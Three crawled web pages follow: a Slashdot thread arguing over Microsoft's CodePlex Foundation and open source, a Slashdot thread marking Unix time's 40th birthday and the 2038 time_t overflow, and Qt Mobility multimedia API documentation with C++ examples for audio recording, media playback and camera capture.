That said, the biggest benefit that Java has isn't so much the open source libra
Re: (Score:2)
60% of the server market, are you high or is this a study from ages ago?
Re: (Score:1, Interesting)
Linux = Opensource, Opensource != Linux
Now that we got that out of the way... He means that
.Net is just not very suitable for open source en cross platform development. In Java, I can use swing, hibernate and other stuff and just assume it will work on other platforms. Usually this doesn't cause any issues if your application is coded decently. However in C# en .NET a lot of useful and sometimes essential functionality is only available in Windows.* namespaces and libraries. These are not available in othe
Re:Let me get this straight (Score:5, Informative)
Microsoft's unfriendliness to Open Source has very little to do with them releasing any, or hosting code repositories.
The unfriendliness is expressed in terms of vague threats using software patents, attempts to derail implementation in various places, suspicious licensing deals like with Novell and so on.
All that has to go for me to start changing my mind. Until that happens, I'm not touching CodePlex with a 10 foot pole, and consider it completely irrelevant at best, and some sort of trap at worst.
Re: (Score:1)
Re: (Score:3, Insightful)
CodePlex may or may not be bad, but Microsoft's history of attacks on open source over the last fifteen years means I'd never use anything they offered. Sorry, maybe that's biased, but I tend to think of it as being cautious and rational.
Re: (Score:2)
Profile of a OSS Zealot:
Thinks M$ is bad because M$ is big huh company lots of money, eats little children;
Linux rocks, every OS steals code from linux, you to xBSD, that network stack is ours;
GPL is the one and only opensource license, everything else must be compatible;
Anything thats not copyleft is not free;
Freedom is a word created by the FSF, and no one has the right to redefine it;
Profile of an OSS Realist:
Think Microsoft has a track record of looking out for its stockholders and has done so by abusively using its position as a monopoly.
Linux is a good OS, which I actually prefer over Windows. Every OS wants to borrow code and concepts from others. You can "borrow" concepts from Linux and not be sued. The same does not hold true for MS or MacOS X.
GPL is a very useful open source license. If you want to come to the biggest open source party out there, you need to be able to dance with
It's A Trap (Score:5, Insightful)
Re: (Score:2)
Re: (Score:2, Informative)
Re: (Score:2)
wont float. (Score:2)
Re: (Score:3, Informative)
FYI, apostraphes aren't just for quoting words for no apparent reason, they're also used in contractions.
Re: (Score:2)
*You* "can" 'emphasise' a $comment$ any ^way^ you like
......
But speaking in "airquotes" can be annoying
....
Re: (Score:2)
Firefox (Score:4, Insightful)
Re: (Score:2)
I know I will probably get flamed for this, but as someone who just developed some
.NET projects (it was the right tool for the job), I did so using Firefox almost exclusively for testing. Note that every component used was a straight .NET component, no third party anything. One day I fired up IE 8 just to see what it looked like. There were things broke all over IE that "just worked" in Firefox (w/ the .net plugin).
On top of all the broken things in IE...the most annoying thing about IE is that links are t
Like github, but worse (Score:2, Interesting)
After a cursory look it seems like an foundation more interested on marketing and policies than in code. I actually had to look hard in order to find the project list.
Am I right to assume that there are only 6 projects?
Seriously, six?
Meh. Call me when they have 600.
(Goes back to github).
Re: (Score:3, Informative).
Re: (Score:3, Informative)
From the article:
"... Not to be confused with Codeplex.com"
I think we both have been looking to different sites. Sure, codeplex.com has lots of projects. But this article is not about it.
Also, FYI: I happen to have suffered eye surgery. As a result, my vision is better than average.
OT: Why are my moderations not registering? (Score:1, Offtopic)
This has been going on for a couple days, ever since I got this batch of mod points. Can someone explain?
Re: (Score:1)
Javascript deactivated? Overzealous firewall?
Re: (Score:2)
Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.3) Gecko/20100402 Firefox/3.6.3
Re: (Score:2)
Good Question...here is my answer (Score:1)
Not exactly any license. (Score:2, Insightful)
Codeplex is utterly GPL unfriendly, i would say GPL hostile. Its also nothing more than a way to steer open source towards being something you build with Microsofts closed technologies. Its not even stealthy in that regard.
I say fuck Microsoft until they prove they can cooperate. Why give them free ammo for absolutely nothing?
Re: (Score:2, Informative)
From [codeplex.org] (emphasis mine):
The Foundation has no pre-suppositions about particular projects, platforms, or open source licenses.
Doesn't sound hostile to the GPL to me.
Re: (Score:2)
CodePlex () hosts over 4500 projects [codeplex.com] licensed under GPLv2 or LGPL (the majority of which are under GPL). Ironically, one of those projects is a Linux distro [codeplex.com].
CodePlex Foundation - a different thing () - doesn't mention GPL at all [google.com] on the website - which, admittedly, raises a brow for an OSS-centric organization - but I still don't see how it makes it "GPL hostile". It looks more like an awkward silence to me.
Re: (Score:1)
Re: (Score:2)
It does mention BSD several times in project listings (i.e. there are projects released under it there), but that's it.
By the way, since I posted the comment, the website does mention GPL now, in a new post to the CodePlex Foundation blog [codeplex.org]:
It can't work (Score:3, Interesting)
Why I don't like MS Hosting FOSS Projects (Score:3, Insightful)
Why I don't like MS Hosting FOSS Projects
... a few reasons.
1) Microsoft has always looked towards the bottom line first and community second.
2) Microsoft doesn't really want any competition in platforms, so anything written that runs on many different platforms will "never behave as well" (performance, threading, resources, etc) as a 100% native application.
3) When Microsoft does attempt to get onboard with a standard app/tool/protocol, they always extend it in a proprietary way. Sometimes they make it better than it was, but since nobody else is allowed to also get those extensions, it doesn't do any good for the original community. Just look at LDAP/Active Directory.
4) Microsoft has had 30+ years to select, port and deliver a good cross platform scripting language, but they have not done so. I would love to have a native-from-Microsoft pre-installed version of Perl on every MS-Windows platform. Still they release wsh, cmd, bat and other similar crap. Where's the MS-Python or MS-Perl or MS-Php? Oh, because those are true FOSS projects, MS can't bastardize them. It doesn't matter how much more productive scripting would be. We know other commercial vendors that include these tools with the OS. Why won't Microsoft?
If you want a new idea to flourish, you need these things:
- small group of _believers_ that work on it for passion, not money
- complete openness in the results - source code in this case
- competition - another real player to battle against who also has complete openness in their code. It is NOT cheating to look at the competition's work.
Examples include the robot soccer team competition where at the end of every competition, all software for every team is shared so the level of play the following year will be elevated for all teams. Basically, the best software for last year is the starting point for all teams in the next competition.
Just a few thoughts.
NDA? (Score:3, Interesting)
I remember back when the Shared Source Initiative was announced, I looked into in, and found that actually seeing any of the source code required signing an NDA (Non-Disclosure Agreement). I closed those windows and forgot about it.
So are there NDAs required by any of the various CodePlex things? Or are there other equivalent "agreements" that have other euphemistic names? That would tell us a lot about their actual intentions.
I've written a lot of software that's secret, proprietary, whatever. The companies that hired me paid me pretty well for the software. But if I'm to get involved in something that I think is going to be shared publicly among a crowd of developers, and then discover that it's actually owned and controlled by the web site's owners, I'm going to feel rather double-crossed. I'd rather know beforehand, so I can avoid wasting my time just to donate code to such organizations.
Another variant of this problem existed on AT&T's Sys/V. I did some development in which some of the machines that I tested the code on ran Sys/V. I found that the binaries always contained an AT&T copyright notice. This was obviously because the binaries linked in the AT&T libc and other libraries. So I refused to distribute binaries for Sys/V, on the grounds that doing so might legally constitute signing my copyright to AT&T. I know of a number of companies that abandoned Sys/V after I pointed this out to them (and their lawyers agreed).
There a lot of tricky ways to lose control of your code to big corporations, and Microsoft has a bit of a rep for tricks like this. So it'd be nice to know up front whether a new repository holds such threats.
Re: (Score:3, Informative)
So are there NDAs required by any of the various CodePlex things? Or are there other equivalent "agreements" that have other euphemistic names? That would tell us a lot about their actual intentions.
I wouldn't be able to say anything about CodePlex Foundation, but then I don't know what you would do there in the first place.
As for CodePlex - no, you don't need any NDAs. It's really just your typical project hosting website, except that it's targeted at the audience that uses MS development technologies (though doesn't exclude other stuff [codeplex.com]).
Re:Yeah. Now we see the truth. (Score:5, Insightful)
In other words MS fanboys are ignorant of MS's history of backstabbing any competitor including one they have partnered with. Actually, especially the ones they have partnered with. CodePlex Foundation should be ignored by the open source community until MS has absolutely no possible influence within the organization.
Re:Yeah. Now we see the truth. (Score:4, Insightful)
Actually it doesn't really matter a bit what MSFT has done in the past, as they like any other company has to obey the license. If all the foundation has is OSI approved licenses, like Apache, BSD, Mozilla, etc then it shouldn't matter to you, I, or anyone else except zealots who pays the bills, as they have to obey the license. Sure in the future they could decide to take any project they own and go closed source with it, but so can the writer/owner of ANY software, and they can't close the previous version, therefor you can always fork.
In the end these projects just show that like Apple MSFT is beginning to see how they can leverage FOSS in certain situations to help themselves as well as anyone else. Nobody expects Apple to give up their proprietary bits, why should MSFT? In the end they have to obey the license or risk being sued (and the resulting bad PR) no different than any other corp.
Re: (Score:3, Insightful)
Still all is based on Microsoft Technologies. So if you design and "Open" killer application in VB dotNet it is not a threat. VB dotNet only runs on Windows. To properly implement it in Mono, you need the odd bits that Microsoft owns the patents on.
The idea is that you develop cool projects that the community can contribute to, but only the coolest of the cool and the best of the best will be able to run on Windows. That's what they call open source.
I would call it a failure. How long did it take source for
Re: (Score:2)
I like how you specifically chose the CLR language that doesn't work on Mono, and then said implied it's part of Microsoft's grand plan.
Hint: The vast majority of code on Codeplex, the code sharing site, is in C#. And Codeplex Foundation is an open source outreach program that will do work behind the scenes like invest in projects, form partnerships, whatever, but not write code.
Re: (Score:2)
Ok, call me paranoid. I just picked one of the major languages on the CLR. The same holds true of the other. In real life VB and C# run on the CLR. And not every facet of C#, VB or the CLR is free enough that I can be sure anything I write in it to be cross platform today does not violate some MS patent which MS will at some point later choose to enforce.
It is there right to enforce those patents. It is my right to choose a language and platform that will not land me in patent enforcement hell someday.
It's
Re: (Score:2)
There are a lot of great libraries at CodePlex, which of course you would be unlikely to hear about in "success stories". Of SourceForge projects, I can probably think of 10 off the top of my head, and maybe, with some serious thought, come up with a list of 25 SourceForge projects that I've had contact with and are still active.
I also think the SourceForge list of "active" projects is misleading and inflated.
Re: (Score:2, Insightful)
Again, look at the history of MS's dealing with their partners with which they have had contracts with. How many times have they been in court and lost. Of course you need deep pockets to take MS to court even if you are right. MS is no friend to open-source and if they can screw a software developer they will, based on past history. They are not happy with a slice of the pie if they can take the whole pie. They still have not come close to changing their spots . . .
They still have leverage (Score:5, Insightful)
The point of codeflex is to get people to develop open source software that runs on Microsoft's Platforms - desktop applications using WPF.NET, web applications using ASP.NET, windows mobile 7 applications using Silverlight, rich web environments using Silverlight. For desktop/phone applications this make sense - free high-quality applications improve the appeal of the operating system. For web applications, the only reason they want this is to increase market share of their proprietary technology. In both cases they still control the platform.
Developers whose sole intention is to write for Microsoft's platforms alone, probably shouldn't have any problems, because MS would be shooting themselves by hindering them. However for developers that write applications in
.NET/Silverlight thinking that the existence of Mono/Moonlight means that it is a great cross-platform tool, could easily be backstabbed by Microsoft if they ever change their stance on patents.
Re:Yeah. Now we see the truth. (Score:4, Insightful)
then it shouldn't matter to you, I, or anyone else except zealots who pays the bills
Based on MS's historical disdain for open source with the current CEO Steve Ballmer even going so far as to refer to Linux as a cancer [theregister.co.uk], I think it extremely naive and presumptuous to refer to people suspicious of their motives as just zealots implying that their caution is without merit. Contrarily, I think anything other than an attitude of extreme skepticism is foolhardiness approaching absurdity.
Furthermore, any license which by its very nature being a legal document is open to ambiguity and interpretation by a court and can very well be used in unpredictable ways to damage open source and to completely downplay this possibility in general and in the case of MS in particular especially in light of their very direct statements against open source is extremely arrogant and misinformed on your part.
Re: (Score:2)
what MSFT has done in the past
So now breaking contracts as part of a business strategy is no predictor of how they'll behave?
Re: (Score:2)
then MS is to the BP oil leak.
the only interest MS has in open source is to muddy the water.
Re: (Score:2)
Another fine example of Microsoft "Technology Evangelist" dollars at work.
Re: (Score:2, Interesting)
Leading question, rhetorical question, whatever, the fact is that everyone knows what Codeplex really is, so at the end of the day, only Microsoft shills seem particularly interesting in pushing it, or using it. The open source community really has no need for yet another trojan horse from Redmond.
|
http://news.slashdot.org/story/10/06/23/1351230/is-the-codeplex-foundation-truly-independent-now
|
crawl-003
|
en
|
refinedweb
|
>>.
Give it 28 years (Score:5, Insightful)
Re: (Score:2, Interesting)
Re: (Score:3, Interesting)
Especially when the 32-bit time_t overflows. The good news is that most 64-bit OSes already uses a 64-bit time_t, but there still is the issue of truncation to 32-bit.
Shouldn't the 32 bit time_t expire in 2106 [wolframalpha.com]?
Re: (Score:2, Informative)
Re: (Score:3, Interesting)
'fraid not. The 32-bit time_t is signed (I'm assuming so you can expression times less than the epoch, but that's just a guess). As such, it actually overflows in 2038 [wolframalpha.com].: (Score:2)
Apparently, at least some implementations define time_t as a signed integer. [wolframalpha.com]: (Score:1, Informative)
Although time_t is a 32-bit value, the 1st bit is the sign bit.
The 1st bit is not a sign bit! Signed integer coding uses two's complement arithmetic [wikipedia.org].
Re: (Score:1)
It doesn't matter that 2's complement is the encoding format used to represent a negative number on certain architectures, or if sign magnitude encoding is used, the MSB is still called a sign bit, if a "1" in that position indicates negative numbers regardless of the encoding format represented by the other bits.
Re: (Score:1)
I'm not disagreeing with you about shooting implementors, necessarily.
But I actually tried using the time functions on 64-bit Linux, Redhat Enterprise Linux 5.4 64-bit.
Some 64-bit values seemed to work, others did not. ex:
# perl -e 'printf "[%d]\n", int(1099511627776)'
[1099511627776]
# perl -e 'use POSIX "ctime"; printf "[%s]\n", ctime(int(1099511627776))'
[]
# perl -e 'use POSIX "ctime"; printf "[%s]\n", ctime(int(2147483648))'
[Mon Jan 18 21:14:08 2038
]
Re: (Score:1)
So when people say "32-bit time_t", what they actually mean is "the effectively 31-bit time_t that is used on most 32-bit systems". Hence, 2038.
Re: (Score:2)
I believe modern 32-bit OSes also have a 64-bit time_t. Especially glibc based ones.
64-bit integers isn't the exclusive realm of 64-bit OSes. It's just 32-bit processors are less efficient when calculating with 64-bit integers (takes multiple instructions). But most modern compilers for 32-bit processors understand 64-bit types natively, inclu
Re: (Score:2)
First Post! (Score:5, Informative)
There is a rickroll in article. Beware to click!
Re: (Score:3, Funny)
Beware what? Seeing in the new year with Rick Astley seems like a pretty good thing to me. Then again, I am easily amused!
Re: (Score:2)
What's wrong with Rick Astley? I've heard worse songs.
It's not April 1 yet (Score:3, Informative)
Did you even check it?
Re: (Score:2)
Re: (Score:2)
The first link took me to a Rick Astley youtube video. Thankfully I was browsing with the sound muted.
Re: (Score:2)
Either the link has been changed, or you're hitting the absinthe a little hard this New Year's.
Re: (Score:2)
See below. It seems there is a bit of messing around with localtime in a flash application on the page. It can't show the number of seconds to 2010 during 2010.
Re: (Score:2)
The first link took me to a Rick Astley youtube video. Thankfully I was browsing with the sound muted.
It's the millennium bug!
Re: (Score:1)
Thankfully my browser sound doesn't work while I'm listening to music. Thanks Ubuntu.
Only a rickroll after midnight (Score:5, Informative)
Re: (Score:2)
Okay its 1524 on the 1st for me. I got the video.
Re: (Score:2)
test
Re: (Score:2)
Re: (Score:2)
I looked after midnight (10/01/01 03:30am local). I got a white page flash up, with some numbers I think, and then youtube. It appears to be controlled by their newYear.swf. Makes you wonder, was there anything more nefarious in that? What a lovely way to start the new year. 10,000 Slashdotters infected with a nice fresh trojan.
Re: (Score:1)
Re:It's not April 1 yet (Score:5, Funny)
You should install the RickBlockPlus [functionalperfection.com] browser addon to prevent this sort of thing happening.
Re: (Score:1)
Re: .
Unix epoch? (Score:3, Interesting)
Why didn't we restart it at 2000 amidst the Y2K mess?
Re:Unix epoch? (Score:5, Interesting)
Putting it in 1970 is a pain. VMS at least put their zero date in 1858, where it is less likely to conflict with real dates. If course, VMS had 64 put support from the word go. Rebasing time_t would have created a horrible mess. Better to start again with a proper date type.
Re: (Score:2)
Why is putting it in 1970 a pain? Because time_t is signed, that gives us the range of 1901 December 13 20:45:52 UTC to 2038 January 19 03:14:07 UTC.
That's 136 or so years from a 32-bit value.
Re: (Score:2)
Because time_t is signed, that gives us the range of 1901 December 13 20:45:52 UTC to 2038 January 19 03:14:07 UTC.
Damn - if only those 6th Century monks had thought of that we wouldn't now be arguing over whether today is the start of a new decade!
Re: (Score:1)
Re: (Score:2)
Isn't the sign bit only used to indicate error? ((time_t)-1) isn't a valid time but perhaps some other negative values are.
Sorry, what are you talking about?
$ echo -1 |awk '{print strftime("%c",$1,0)}'
Wed 31 Dec 1969 04:59:59 PM MST
$ echo -1 |awk '{print strftime("%c",$1,1)}'
Wed 31 Dec 1969 11:59:59 PM GMT
$ echo -1 |awk '{print strftime("%s",$1,0)}'
-1
Seems to work fine for me.
Re:Unix epoch? (Score:5, Funny)
Why didn't we restart it at 2000 amidst the Y2K mess?
You have a promising career in middle management ahead of you!
Re: (Score:2, Insightful)
No, no, middle management does all the work. Such a decision is usually done by top management.
Re: (Score:1, Informative)
Re: (Score:2)
Why was the epoch chosen to be 00:00:00 UTC on 1 January 1970?
I know the epoch was changed around a bit because early versions of the unix time system functioned at rates greater then 1hz, and hence would run out of room in the 32bit space really really fast. I'm not sure why that particular date was the one they settled on, hopefully someone else can fill in.
Why didn't we restart it at 2000 amidst the Y2K mess?
I'm not 100% on this, but I believe the Y2K mess didn't effect Unix-y systems at all. The way Unix time works, if you're not familiar, is that it just counts the seconds after the epoch. Whether the year is.
Yes, assuming well-behaved programs. But it is a fact that Y2K doesn't affect this particular interface at.
Remember all of the Perl-based CGI wishing you a Happy New Year on January 1, 19100? I have old books in a box somewhere from *1997* with sample code telling users to print "19" then append the year value. It affect
Damn you Slashdot! (Score:5, Funny)
Re: (Score:1)
"So x" is so 200x.
Re: (Score:1)
Re: (Score:1)
It's actually a rollover joke.
Over the hill? (Score:2)
I turn 45 this year you insensitive clod! Passing the top of the hill just means I am gaining momentum for the next climb, anyway.
BTW why does the summary point to a page which returns
(54) Connection reset by peer
Maybe the server is over the hill.
Re: (Score:2)
I don't know what special relationship with mortality you have, Sisyphus, but when most of us crest the hill, it's a smooth coast to the bottom.
Re: (Score:2)
I don't know what special relationship with mortality you have
I am a hacker. Many things are possible.
Re: (Score:2)
Re: (Score:3, Insightful)
I reject your reality and substitute my own.
Re:Over the hill? (Score:5, Interesting)
Re: (Score:3, Informative)
Perl version? (Score:2)
Cool. But would someone please translate this obfuscated Ruby into some readable Perl?
Re: (Score:2)
import time
for i in range(0,31):
print "0"*(30-i) + "1" + "0"*i + " " + time.strftime("%a %b %d %H:%M:%S +0000 %Y",time.gmtime(2**i))
for i in reversed(range(0,31)):
print "1"*(31-i) + "0"*i + " " + time.strftime("%a %b %d %H:%M:%S +0000 %Y",time.gmtime(2**31 - 2**i))
print "$"
Re: (Score:2)
Indeed, that was much more readable. And helped writing this Perl version, despite the Python trap (for a Python-illiterate) of "range(0,31)" apparently meaning "from 0 to 30":
for (0..30) {
print "0"x(30-$_), 1, "0"x$_, " ", scalar gmtime(2**$_), "\n";
}
for (reverse 0..29) {
print "1"x(31-$_), "0"x$_, " ", scalar gmtime(2**31 - 2**$_), "\n";
}
Now, maybe someone can condense it into a smarter one-liner, with some clever use of printf and/or pack/unpack.
Re: (Score:2)
import time
for i in range(0,61): print str((i>30)*1) * abs(i-30) + "1" + "0" * (30 - abs(i-30)) + " " + time.strftime("%a %b %d %H:%M:%S +0000 %Y",time.gmtime((2**(30 - abs(i-30))) * ((i <= 30) * 2 - 1) + 2 ** 31 * (i > 30)))
Re: (Score:2)
And here is the one-liner Perl version, using printf's %b:
$ perl -e 'for (0..30) {printf "%031b %s\n", 2**$_, scalar gmtime(2**$_)} for (reverse 0..29) {printf "%031b %s\n", 2**31-2**$_, scalar gmtime(2**31-2**$_)}'
Beware of parent's bomb! (Score:2)
Beware! The parent's code is the well-known Bash fork bomb [cyberciti.biz].
Windows (Score:2, Funny)
The Windows clock starts the second Gates stiffed IBM out of the DOS market.
Why is there a link to this guy's blog? (Score:3, Interesting)
Why is there a link in the summary to some guy's blog which says exactly what I've pasted above? I mean really, just put the information in the summary without the link....
Re: (Score:3, Insightful)
More important, why is the guy with the blog still wearing a face mullet, in 2010?
And have you ever met an "independent game producer" with such a neatly trimmed beard?
Re: (Score:2)
I use the day as my "birthday" on public websites in tribute.
Wow. He is hardcore!
Some of us ... (Score:2)
That's funny,... (Score:5, Funny)
My clock says today is Setting Orange, Day 73 of the Aftermath in the Year of Our Lady of Discord 3175.
Re: (Score:1)
I want a copy of your clock. Where might such a thing be acquired?
Note: I am too drunk to use Google properly at this juncture.
Re: (Score:2)
Telecommando is obviously a time traveller.
Re: (Score:1)
...oops
;-)
Re: (Score:3, Informative)
Re: (Score:2)
Not a clock, it's a calender [wikipedia.org].
Problem with this (Score:2)
This isn't really a valid birthday unless time() was actually compiled and run for the first time immediately after midnight on January 1, 1970. I mean, c'mon, are we supposed to also be celebrating the 190th birthday of perl's localtime()?
Re: (Score:2)
... er, make that 110th - sorry about that. Darn Slashdot and its lack of an edit function...
Re:Problem with this (Score:5, Insightful)
I don't know about you, but I'm ready to drink to that.
My wife and I opened a bottle of champagne a few hours ago, and she's fallen asleep after two glasses, the lightweight. I had a double espresso with my pecan pie and now I'm ready to friggin' rawk!
After I submit this, I'm gonna go show some Borderlands weaklings who's boss. Either that or finish the champagne and go watch the fireworks from my rooftop, naked. It's -2 degrees F outside though, so maybe I ought to pull out the thermal merkin first. I mean, subzero temperatures, nudity and high blood-alcohol level - what could possibly go wrong?
Re: (Score:2)
go watch the fireworks from my rooftop, naked.
I had similar plans but then our 38 degree C [wolframalpha.com] day turned into really serious thunder and lightening so I decided to give the naked roof standing a miss. The roof is steel and quite well grounded.
Re: (Score:2)
Yeah, the fireworks will be all washed out from the lightening anyway. Was the lightening caused by lightning, perhaps? Meteors? Or was it just fog and ordinary street-lams?
Flash? Seriously? (Score:3, Insightful)
Just for showing the epoch time?
Re: (Score:1, Funny)
It makes sense when the time hits midnight.
This is not true (Score:5, Informative)
Epoch starts at January 1st, 1970, but the system call itself was not around in 1970 [wikipedia.org].
Am I the only one? (Score:3, Insightful)
Who is almost exactly as old as *nix time?
Re: (Score:2)
Some of us are already "on the other side".
No I don't mean Windows. %-P
Rgds
Damon
Re: (Score:2)
Is %-P a legal printf() format?
Re: (Score:2)
When you're older than UNIX, you get to choose...
It's also how you look when trying to read the sprintf() man page on a mobile device.
Rgds
Damon
Re: (Score:2)
I am also "as old as time".
I turned 40 on 9-9-9.
Re: (Score:2)
Hey, we're birthday-brothers. I turned 22 on 999.
Hmm... (Score:2)
Apparently Slashdot's version of time_t had a year 2010 problem!
Happy new year anyway!
date +%s (Score:1)
On a *nix system, type "date +%s" to see the number of seconds since the Unix epoch started.
Re: (Score:2)
That is, on GNU systems. Not all Unix systems support %s, and it isn't in the standard, either.
Re: (Score:2)
Never gonna do that again
Never gonna do what again?
a) Give you up
b) Let you down
c) Run around and desert you
d) All of the above
|
http://tech.slashdot.org/story/10/01/01/024210/Raise-a-Glass-mdash-Time2-Turns-40-Tonight
|
crawl-003
|
en
|
refinedweb
|
QtMultimediaKit provides a set of APIs that allow the developer to play, record and manage a collection of media content. It is dependent on the QtMultimedia module. QtMultimediaKit is the recommended API to build multimedia applications using Qt. The Phonon API is no longer recommended.
Unlike the other APIs in QtMobility, the Multimedia API is not in the QtMobility namespace.
This API delivers an easy to use interface to multimedia functions. The developer can use the API to display an image, or a video, record sound or play a multimedia stream.
There are several benefits this API brings to Qt. Firstly, the developer can now implement fundamental multimedia functions with minimal code, mostly because they are already implemented. Also there is a great deal of flexibility with the media source or the generated multimedia. The source file does not need to be local to the device, it could be streamed from a remote location and identified by a URL. Finally, many different codecs are supported 'out of the box'.
The supplied examples give a good idea at the ease of use of the API. When the supporting user interface code is ignored we can see that functionality is immediately available with minimal effort.
The Audio Recorder example is a good introduction to the basic use of the API. We will use snippets from this example to illustrate how to use the API to quickly build functionality.
The first step is to demonstrate recording audio to a file. When recording from an audio source there are a number of things we may want to control beyond the essential user interface. We may want a particular encoding of the file, MP3 or Ogg Vorbis for instance, or select a different input source. The user may modify the bitrate, number of channels, quality and sample rate. Here the example will only modify the codec and the source device, since they are essential.
To begin, the developer sets up a source and a recorder object. A QAudioCaptureSource object is created and used to initialize a QMediaRecorder object. The output file name is then set for the QMediaRecorder object.
audiosource = new QAudioCaptureSource; capture = new QMediaRecorder(audiosource); capture->setOutputLocation(QUrl("test.raw"));
A list of devices is needed so that an input can be selected in the user interface
for(int i = 0; i < audiosource->deviceCount(); i++) deviceBox->addItem(audiosource->name(i));
and a list of the supported codecs for the user to select a codec,
QStringList codecs = capture->supportedAudioCodecs(); for(int i = 0; i < codecs.count(); i++) codecsBox->addItem(codecs.at(i));
To set the selected device or codec just use the index of the device or codec by calling the setter in audiosource or capture as appropriate, for example,
audiosource->setSelectedDevice(i); ... capture->setAudioCodec(codecIdx);
Now start recording by using the record() function from the new QMediaRecorder object
capture->record();
And stop recording by calling the matching function stop() in QMediaRecorder.
capture->stop();
How then would this audio file be played? The QMediaPlayer class will be used as a generic player. Since the player can play both video and audio files the interface will be more complex, but for now the example will concentrate on the audio aspect.
Playing the file is simple: create a player object, pass in the filename, set the volume or other parameters, then play. Not forgetting that the code will need to be hooked up to the user interface.
QMediaPlayer *player = new QMediaPlayer; ... player->setMedia(QUrl::fromLocalFile("test.raw")); player->setVolume(50); player->play();
The filename does not have to be a local file. It could be a URL to a remote resource. Also by using the QMediaPlaylist class from this API we can play a list of local or remote files. The QMediaPlaylist class supports constructing, managing and playing playlists.
player = new QMediaPlayer; playlist = new QMediaPlaylist(player); playlist->addMedia(QUrl("")); playlist->addMedia(QUrl("")); ... playlist->setCurrentPosition(1); player->play();
To manipulate the playlist there are the usual management functions (which are in fact slots): previous, next, setCurrentPosition and shuffle. Playlists can be built, saved and loaded using the API.
Continuing with the example discussed for an Audio recorder/player, we can use this to show how to play video files with little change to the code.
Moving from audio to video requires few changes in the sample code. To play a video playlist the code can be changed to include another new QtMobility Project class: QVideoWidget. This class enables control of a video resource with signals and slots for the control of brightness, contrast, hue, saturation and full screen mode.
player = new QMediaPlayer; playlist = new QMediaPlaylist(player); playlist->addMedia(QUrl("")); playlist->addMedia(QUrl("")); ... widget = new QVideoWidget(player); widget->show(); playlist->setCurrentPosition(1); player->play();
The Player example does things a bit differently to our sample code. Instead of using a QVideoWidget object directly, the Player example has a VideoWidget class that inherits from QVideoWidget. This means that functions can be added to provide functions such as full screen display, either on a double click or on a particular keypress.
videoWidget = new VideoWidget(this); player->setVideoOutput(videoWidget); playlistModel = new PlaylistModel(this); playlistModel->setPlaylist(playlist);
Creating still images and video.
In order to capture an image we need to create a QCamera object and use it to initialize a QVideoWidget, so we can see where the camera is pointing - a viewfinder. The camera object is also used to initialize a new QCameraImageCapture object, imageCapture. All that is then needed is to start the camera, lock it so that the settings are not changed while the image capture occurs, capture the image, and finally unlock the camera ready for the next photo.();
Note: Alternatively, we could have used a QGraphicsVideoItem as a viewfinder.
Previously we saw code that allowed the capture of a still image. Recording video requires the use of a QMediaRecorder object and a QAudioCaptureSource for sound.
To record video we need a camera object, as before, a media recorder and a viewfinder object. The media recorder object will need to be initialized.
camera = new QCamera; mediaRecorder = new QMediaRecorder(camera); camera->setCaptureMode(QCamera::CaptureVideo); camera->start(); //on shutter button pressed mediaRecorder->record();(), pause(), stop() and setMuted() slots in QMediaRecorder.
When the camera is in video mode, as decided by the application, then as the shutter button is pressed the camera is locked as before but instead the record() function in QMediaRecorder is used.
Focusing is managed by the classes QCameraFocus and QCameraFocusControl.. FocusPointMode has support for face recognition, center focus and a custom focus where the focus point can be specified.
Various operations such as image capture and auto focusing occur asynchrously. These operations can often be cancelled by the start of a new operation as long as this is supported by the backend. For image capture, the operation can be cancelled by calling cancelCapture(). For auto-focus, auto-exposure or white balance cancellation can be done by calling unlock(QCamera::LockFocus)..
The Camera Example shows how use the QtMultimediaKit API to quickly write a camera application in C++.
The QML Camera Example demonstrates still image capture and controls using the QML plugin. Video recording is not currently available.
The QML Video Example demonstrates the various manipulations (move; resize; rotate; change aspect ratio) which can be applied to QML Video and Camera items.
It also shows how native code can be combined with QML to implement more advanced functionality - in this case, C++ code is used to calculate the QML frame rate and (on Symbian) the graphics memory consumption; these metrics are rendered in QML as semi-transparent items overlaid on the video content.
The QML Video Shader Effects Example shows how the ShaderEffectItem element can be used to apply postprocessing effects, expressed in GLSL, to QML Video and Camera items.
It re-uses the frame rate and memory consumption display code used by the QML Video Example.
Finally, this application demonstrates the use of different top-level QML files to handle different physical screen sizes. On small-screen devices, menus are by default hidden, and only appear when summoned by a gesture. Large-screen devices show a more traditional layout in which menus are displayed around the video content pane.
For developers wishing to access some platform specific settings, or to port the Qt Multimedia APIs to a new platform or technology, see Multimedia Backend Development.
On Symbian, the QVideoRendererControl class may provide video frames in one of two forms:
Which of these paths is available depends on the version of the Symbian platform, and on the source of the video data:
Where multiple paths are available, the default can be overridden by setting the "_q_eglRenderingAllowed" property on the QMediaService object. If this property is true and the "EGL" path is available, it is used. Otherwise the "software" path is used.
// create a camera whose viewfinder may render via EGL camera = new QCamera; camera->service()->setProperty("_q_eglRenderingAllowed", true);
Note that, for rendering video frames to the screen, the QGraphicsVideoItem implementation uses the most efficient route available (which is never the "software" path). Selection of the correct rendering path is done automatically and is transparent to the client:
|
http://doc.troll.no/qtmobility-1.2/multimedia.html
|
crawl-003
|
en
|
refinedweb
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.